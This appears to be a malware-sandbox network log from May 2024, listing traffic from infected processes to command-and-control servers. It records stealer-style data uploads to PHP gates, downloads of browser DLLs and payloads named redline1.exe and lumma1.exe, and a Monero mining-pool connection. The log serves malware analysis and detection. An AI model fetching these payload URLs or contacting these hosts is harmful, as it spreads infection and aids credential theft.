                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:40:11 GMT
                                                                                                                                                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                                  Last-Modified: Mon, 05 Sep 2022 14:30:30 GMT
ETag: "10e436-5e7eeebed8d80"
Accept-Ranges: bytes
Content-Length: 1106998
Content-Type: application/x-msdos-program
• flag-de
POST
http://185.172.128.150/c698e1bc8a2f5e6d.php
u2rs.0.exe
Remote address:
185.172.128.150:80
Request
POST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----GHJEHJJDAAAKEBGCFCAA
Host: 185.172.128.150
Content-Length: 359
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Date: Sat, 11 May 2024 22:40:11 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
• flag-de
POST
http://185.172.128.150/c698e1bc8a2f5e6d.php
u2rs.0.exe
Remote address:
185.172.128.150:80
Request
POST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----FIEHIIIJDAAAAAAKECBF
Host: 185.172.128.150
Content-Length: 359
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Date: Sat, 11 May 2024 22:40:12 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
• flag-de
GET
http://185.172.128.150/b7d0cfdb1d966bdd/freebl3.dll
u2rs.0.exe
Remote address:
185.172.128.150:80
Request
GET /b7d0cfdb1d966bdd/freebl3.dll HTTP/1.1
Host: 185.172.128.150
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Date: Sat, 11 May 2024 22:40:12 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
ETag: "a7550-5e7ebd4425100"
Accept-Ranges: bytes
Content-Length: 685392
Content-Type: application/x-msdos-program
• flag-de
GET
http://185.172.128.150/b7d0cfdb1d966bdd/mozglue.dll
u2rs.0.exe
Remote address:
185.172.128.150:80
Request
GET /b7d0cfdb1d966bdd/mozglue.dll HTTP/1.1
Host: 185.172.128.150
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Date: Sat, 11 May 2024 22:40:12 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
ETag: "94750-5e7ebd4425100"
Accept-Ranges: bytes
Content-Length: 608080
Content-Type: application/x-msdos-program
• flag-de
GET
http://185.172.128.150/b7d0cfdb1d966bdd/msvcp140.dll
u2rs.0.exe
Remote address:
185.172.128.150:80
Request
GET /b7d0cfdb1d966bdd/msvcp140.dll HTTP/1.1
Host: 185.172.128.150
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Date: Sat, 11 May 2024 22:40:13 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
ETag: "6dde8-5e7ebd4425100"
Accept-Ranges: bytes
Content-Length: 450024
Content-Type: application/x-msdos-program
• flag-de
GET
http://185.172.128.150/b7d0cfdb1d966bdd/nss3.dll
u2rs.0.exe
Remote address:
185.172.128.150:80
Request
GET /b7d0cfdb1d966bdd/nss3.dll HTTP/1.1
Host: 185.172.128.150
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Date: Sat, 11 May 2024 22:40:13 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
ETag: "1f3950-5e7ebd4425100"
Accept-Ranges: bytes
Content-Length: 2046288
Content-Type: application/x-msdos-program
• flag-de
GET
http://185.172.128.150/b7d0cfdb1d966bdd/softokn3.dll
u2rs.0.exe
Remote address:
185.172.128.150:80
Request
GET /b7d0cfdb1d966bdd/softokn3.dll HTTP/1.1
                                                                                                                                                                                                                                                                  Host: 185.172.128.150
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:40:14 GMT
                                                                                                                                                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                                  Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                                                                                                                                                                                                  ETag: "3ef50-5e7ebd4425100"
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                  Content-Length: 257872
                                                                                                                                                                                                                                                                  Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  http://185.172.128.150/b7d0cfdb1d966bdd/vcruntime140.dll
                                                                                                                                                                                                                                                                  u2rs.0.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  185.172.128.150:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /b7d0cfdb1d966bdd/vcruntime140.dll HTTP/1.1
                                                                                                                                                                                                                                                                  Host: 185.172.128.150
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:40:14 GMT
                                                                                                                                                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                                  Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                                                                                                                                                                                                  ETag: "13bf0-5e7ebd4425100"
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                  Content-Length: 80880
                                                                                                                                                                                                                                                                  Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://185.172.128.150/c698e1bc8a2f5e6d.php
                                                                                                                                                                                                                                                                  u2rs.0.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  185.172.128.150:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /c698e1bc8a2f5e6d.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----IJDBKKJKJEBFBGCBAAFI
                                                                                                                                                                                                                                                                  Host: 185.172.128.150
                                                                                                                                                                                                                                                                  Content-Length: 947
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:40:14 GMT
                                                                                                                                                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=87
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://185.172.128.150/c698e1bc8a2f5e6d.php
                                                                                                                                                                                                                                                                  u2rs.0.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  185.172.128.150:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /c698e1bc8a2f5e6d.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----JKKKJJJKJKFHJJJJECBF
                                                                                                                                                                                                                                                                  Host: 185.172.128.150
                                                                                                                                                                                                                                                                  Content-Length: 267
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:40:14 GMT
                                                                                                                                                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  Content-Length: 2408
                                                                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=86
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://185.172.128.150/c698e1bc8a2f5e6d.php
                                                                                                                                                                                                                                                                  u2rs.0.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  185.172.128.150:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /c698e1bc8a2f5e6d.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----IDHIEGIIIECAKEBFBAAE
                                                                                                                                                                                                                                                                  Host: 185.172.128.150
                                                                                                                                                                                                                                                                  Content-Length: 265
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:40:14 GMT
                                                                                                                                                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  Content-Length: 2052
                                                                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=85
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://185.172.128.150/c698e1bc8a2f5e6d.php
  u2rs.0.exe
  Remote address: 185.172.128.150:80
  Request
  POST /c698e1bc8a2f5e6d.php HTTP/1.1
  Content-Type: multipart/form-data; boundary=----FHDAEHDAKECGCAKFCFIJ
  Host: 185.172.128.150
  Content-Length: 647443
  Connection: Keep-Alive
  Cache-Control: no-cache
  Response
  HTTP/1.1 200 OK
  Date: Sat, 11 May 2024 22:40:15 GMT
  Server: Apache/2.4.52 (Ubuntu)
  Content-Length: 0
  Keep-Alive: timeout=5, max=84
  Connection: Keep-Alive
  Content-Type: text/html; charset=UTF-8
• flag-de
  POST http://185.172.128.150/c698e1bc8a2f5e6d.php
  u2rs.0.exe
  Remote address: 185.172.128.150:80
  Request
  POST /c698e1bc8a2f5e6d.php HTTP/1.1
  Content-Type: multipart/form-data; boundary=----CAFBGDHCBAEHIDGCGIDA
  Host: 185.172.128.150
  Content-Length: 15735
  Connection: Keep-Alive
  Cache-Control: no-cache
  Response
  HTTP/1.1 200 OK
  Date: Sat, 11 May 2024 22:40:21 GMT
  Server: Apache/2.4.52 (Ubuntu)
  Content-Length: 0
  Keep-Alive: timeout=5, max=83
  Connection: Keep-Alive
  Content-Type: text/html; charset=UTF-8
• flag-de
  POST http://185.172.128.150/c698e1bc8a2f5e6d.php
  u2rs.0.exe
  Remote address: 185.172.128.150:80
  Request
  POST /c698e1bc8a2f5e6d.php HTTP/1.1
  Content-Type: multipart/form-data; boundary=----FIIIIJKFCAAECAKFIEHC
  Host: 185.172.128.150
  Content-Length: 15731
  Connection: Keep-Alive
  Cache-Control: no-cache
  Response
  HTTP/1.1 200 OK
  Date: Sat, 11 May 2024 22:40:21 GMT
  Server: Apache/2.4.52 (Ubuntu)
  Content-Length: 0
  Keep-Alive: timeout=5, max=82
  Connection: Keep-Alive
  Content-Type: text/html; charset=UTF-8
• flag-de
  POST http://185.172.128.150/c698e1bc8a2f5e6d.php
  u2rs.0.exe
  Remote address: 185.172.128.150:80
  Request
  POST /c698e1bc8a2f5e6d.php HTTP/1.1
  Content-Type: multipart/form-data; boundary=----JKJKJJDBKEGIECAAECFH
  Host: 185.172.128.150
  Content-Length: 77111
  Connection: Keep-Alive
  Cache-Control: no-cache
  Response
  HTTP/1.1 200 OK
  Date: Sat, 11 May 2024 22:40:23 GMT
  Server: Apache/2.4.52 (Ubuntu)
  Content-Length: 0
  Keep-Alive: timeout=5, max=81
  Connection: Keep-Alive
  Content-Type: text/html; charset=UTF-8
• flag-de
  POST http://185.172.128.150/c698e1bc8a2f5e6d.php
  u2rs.0.exe
  Remote address: 185.172.128.150:80
  Request
  POST /c698e1bc8a2f5e6d.php HTTP/1.1
  Content-Type: multipart/form-data; boundary=----EGDGIIJJECFIDHJJKKFC
  Host: 185.172.128.150
  Content-Length: 270
  Connection: Keep-Alive
  Cache-Control: no-cache
  Response
  HTTP/1.1 200 OK
  Date: Sat, 11 May 2024 22:40:24 GMT
  Server: Apache/2.4.52 (Ubuntu)
  Content-Length: 0
  Keep-Alive: timeout=5, max=80
  Connection: Keep-Alive
  Content-Type: text/html; charset=UTF-8
• flag-us
  POST http://svc.iolo.com/__svc/sbv/DownloadManager.ashx
  Remote address: 20.157.87.45:80
  Request
  POST /__svc/sbv/DownloadManager.ashx HTTP/1.0
  Connection: keep-alive
  Content-Length: 300
  Host: svc.iolo.com
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Encoding: identity
  User-Agent: Mozilla/3.0 (compatible; Indy Library)
  Response
  HTTP/1.1 200 OK
  cache-control: private
  content-length: 192
  content-type: text/html; charset=utf-8
  x-whom: Ioloweb7
  date: Sat, 11 May 2024 22:40:24 GMT
  set-cookie: SERVERID=svc7; path=/
  connection: close
• 5.42.96.141:80
  http://5.42.96.141/go34ko8/index.php
  http
  explorku.exe
  1.6kB
  1.7kB
                                                                                                                                                                                                                                                                  14
                                                                                                                                                                                                                                                                  12

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://5.42.96.141/go34ko8/index.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://5.42.96.141/go34ko8/index.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://5.42.96.141/go34ko8/index.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://5.42.96.141/go34ko8/index.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://5.42.96.141/go34ko8/index.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200
                                                                                                                                                                                                                                                                • 5.42.96.7:80
                                                                                                                                                                                                                                                                  http://5.42.96.7/cost/random.exe
                                                                                                                                                                                                                                                                  http
                                                                                                                                                                                                                                                                  explorku.exe
                                                                                                                                                                                                                                                                  233.5kB
                                                                                                                                                                                                                                                                  6.9MB
                                                                                                                                                                                                                                                                  4925
                                                                                                                                                                                                                                                                  4923

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://5.42.96.7/cost/sarra.exe

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://5.42.96.7/mine/amers.exe

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://5.42.96.7/cost/random.exe

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200
                                                                                                                                                                                                                                                                • 5.42.96.7:80
                                                                                                                                                                                                                                                                  http://5.42.96.7/zamo7h/index.php
                                                                                                                                                                                                                                                                  http
                                                                                                                                                                                                                                                                  axplons.exe
                                                                                                                                                                                                                                                                  240.1kB
                                                                                                                                                                                                                                                                  7.0MB
                                                                                                                                                                                                                                                                  5052
                                                                                                                                                                                                                                                                  5034

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://5.42.96.7/zamo7h/index.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://5.42.96.7/zamo7h/index.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://5.42.96.7/lend/alex.exe

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://5.42.96.7/zamo7h/index.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://5.42.96.7/lend/gold.exe

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://5.42.96.7/zamo7h/index.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://5.42.96.7/lend/redline1.exe

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://5.42.96.7/zamo7h/index.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://5.42.96.7/zamo7h/index.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://5.42.96.7/lend/swizzhis.exe

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://5.42.96.7/zamo7h/index.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://5.42.96.7/lend/udated.exe

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://5.42.96.7/zamo7h/index.php

                                                                                                                                                                                                                                                                  HTTP Response

200

HTTP Request
GET http://5.42.96.7/lend/lumma1.exe
HTTP Response
200

HTTP Request
POST http://5.42.96.7/zamo7h/index.php
HTTP Response
200

HTTP Request
POST http://5.42.96.7/zamo7h/index.php
HTTP Response
200

HTTP Request
GET http://5.42.96.7/lend/deat.exe
HTTP Response
200

HTTP Request
POST http://5.42.96.7/zamo7h/index.php
HTTP Response
200

• 104.21.39.216:443
  zippyfinickysofwps.shop
  tls
  RegAsm.exe
  1.6kB
  7.6kB
  13
  12

• 185.172.128.33:8970
  keks.exe
  4.3MB
  81.8kB
  3255
  1676

• 104.21.59.156:443
  acceptabledcooeprs.shop
  tls
  RegAsm.exe
  1.1kB
  6.6kB
  10
  10

• 172.67.192.5:443
  obsceneclassyjuwks.shop
  tls
  RegAsm.exe
  1.1kB
  7.0kB
  10
  10

• 172.67.173.139:443
  miniaturefinerninewjs.shop
  tls
  RegAsm.exe
  1.1kB
  6.9kB
  10
  9

• 104.21.53.146:443
  plaintediousidowsko.shop
  tls
  RegAsm.exe
  1.1kB
  6.9kB
  10
  9

• 104.21.44.201:443
  sweetsquarediaslw.shop
  tls
  RegAsm.exe
  1.1kB
  6.9kB
  10
  9

• 5.42.65.67:48396
  trf.exe
  4.0MB
  60.1kB
  3042
  1069

• 172.67.183.72:443
  holicisticscrarws.shop
  tls
  RegAsm.exe
  1.1kB
  6.5kB
  10
  9

• 172.67.186.30:443
  boredimperissvieos.shop
  tls
  RegAsm.exe
  1.1kB
  6.6kB
  10
  10

• 77.221.151.47:80
  http://77.221.151.47/install.exe
  http
  axplons.exe
  152.7kB
  4.6MB
  3284
  3283

  HTTP Request
  GET http://77.221.151.47/install.exe
  HTTP Response
  200

• 185.215.113.67:26260
  redline1.exe
  4.2MB
  70.6kB
  3043
  1438

• 77.221.151.47:8080
  PiercingNetLink.exe
  353 B
  268 B
  5
  5

• 49.13.229.86:80
  http://49.13.229.86/c73eed764cc59dcb.php
  http
  RegAsm.exe
  193.3kB
  5.4MB
  3917
  3911

  HTTP Request
  POST http://49.13.229.86/c73eed764cc59dcb.php
  HTTP Response
  200

  HTTP Request
  POST http://49.13.229.86/c73eed764cc59dcb.php
  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://49.13.229.86/c73eed764cc59dcb.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://49.13.229.86/c73eed764cc59dcb.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://49.13.229.86/84bad7132df89fd7/sqlite3.dll

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://49.13.229.86/c73eed764cc59dcb.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://49.13.229.86/c73eed764cc59dcb.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://49.13.229.86/84bad7132df89fd7/freebl3.dll

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://49.13.229.86/84bad7132df89fd7/mozglue.dll

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://49.13.229.86/84bad7132df89fd7/msvcp140.dll

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://49.13.229.86/84bad7132df89fd7/nss3.dll

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://49.13.229.86/84bad7132df89fd7/softokn3.dll

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://49.13.229.86/84bad7132df89fd7/vcruntime140.dll

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://49.13.229.86/c73eed764cc59dcb.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://49.13.229.86/c73eed764cc59dcb.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://49.13.229.86/c73eed764cc59dcb.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://49.13.229.86/c73eed764cc59dcb.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://49.13.229.86/c73eed764cc59dcb.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200
                                                                                                                                                                                                                                                                • 77.221.151.47:9090
                                                                                                                                                                                                                                                                  GameSyncLinks.exe
                                                                                                                                                                                                                                                                  450 B
                                                                                                                                                                                                                                                                  608 B
                                                                                                                                                                                                                                                                  7
                                                                                                                                                                                                                                                                  7
                                                                                                                                                                                                                                                                • 172.67.183.72:443
                                                                                                                                                                                                                                                                  holicisticscrarws.shop
                                                                                                                                                                                                                                                                  tls
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  1.6kB
                                                                                                                                                                                                                                                                  7.6kB
                                                                                                                                                                                                                                                                  13
                                                                                                                                                                                                                                                                  14
                                                                                                                                                                                                                                                                • 162.19.139.184:2222
                                                                                                                                                                                                                                                                  xmr.2miners.com
                                                                                                                                                                                                                                                                  910402.exe
                                                                                                                                                                                                                                                                  1.1kB
                                                                                                                                                                                                                                                                  2.6kB
                                                                                                                                                                                                                                                                  12
                                                                                                                                                                                                                                                                  11
                                                                                                                                                                                                                                                                • 104.21.59.156:443
                                                                                                                                                                                                                                                                  acceptabledcooeprs.shop
                                                                                                                                                                                                                                                                  tls
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  1.1kB
                                                                                                                                                                                                                                                                  6.5kB
                                                                                                                                                                                                                                                                  10
                                                                                                                                                                                                                                                                  9
                                                                                                                                                                                                                                                                • 172.67.192.5:443
                                                                                                                                                                                                                                                                  obsceneclassyjuwks.shop
                                                                                                                                                                                                                                                                  tls
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  1.1kB
                                                                                                                                                                                                                                                                  6.9kB
                                                                                                                                                                                                                                                                  10
                                                                                                                                                                                                                                                                  9
(columns: address | domain or URL | protocol | process | bytes sent | bytes received | packets sent | packets received)

• 104.21.39.216:443 | zippyfinickysofwps.shop | tls | RegAsm.exe | 1.1kB | 6.6kB | 10 | 10
• 77.221.151.47:8080 | - | - | PiercingNetLink.exe | 399 B | 268 B | 6 | 5
• 172.67.173.139:443 | miniaturefinerninewjs.shop | tls | RegAsm.exe | 1.2kB | 7.0kB | 11 | 11
• 104.21.53.146:443 | plaintediousidowsko.shop | tls | RegAsm.exe | 1.1kB | 6.9kB | 10 | 9
• 104.21.44.201:443 | sweetsquarediaslw.shop | tls | RegAsm.exe | 1.1kB | 6.9kB | 10 | 9
• 172.67.186.30:443 | boredimperissvieos.shop | tls | RegAsm.exe | 1.1kB | 6.6kB | 10 | 10
• 5.42.96.78:80 | http://5.42.96.78/files/file300un.exe | http | axplons.exe | 1.1MB | 33.0MB | 23714 | 23708
    HTTP Request: GET http://5.42.96.78/files/file300un.exe
    HTTP Response: 200
• 172.67.162.147:443 | smallelementyjdui.shop | tls | RegAsm.exe | 1.6kB | 7.6kB | 13 | 15
• 77.221.151.47:8080 | - | - | PiercingNetLink.exe | 353 B | 268 B | 5 | 5
• 172.67.169.40:443 | sofaprivateawarderysj.shop | tls | RegAsm.exe | 1.1kB | 6.9kB | 10 | 9
• 104.21.62.251:443 | lineagelasserytailsd.shop | tls | RegAsm.exe | 1.1kB | 6.9kB | 10 | 9
• 104.21.85.127:443 | tendencyportionjsuk.shop | tls | RegAsm.exe | 1.1kB | 6.6kB | 10 | 10
• 104.192.141.1:443 | https://bitbucket.org/qwizzi/tt522222/downloads/FlexPremises.exe | tls, http | redline1.exe | 835 B | 8.2kB | 9 | 12
    HTTP Request: GET https://bitbucket.org/qwizzi/tt522222/downloads/FlexPremises.exe
    HTTP Response: 302
• 104.21.50.137:443 | headraisepresidensu.shop | tls | RegAsm.exe | 1.1kB | 6.5kB | 10 | 9
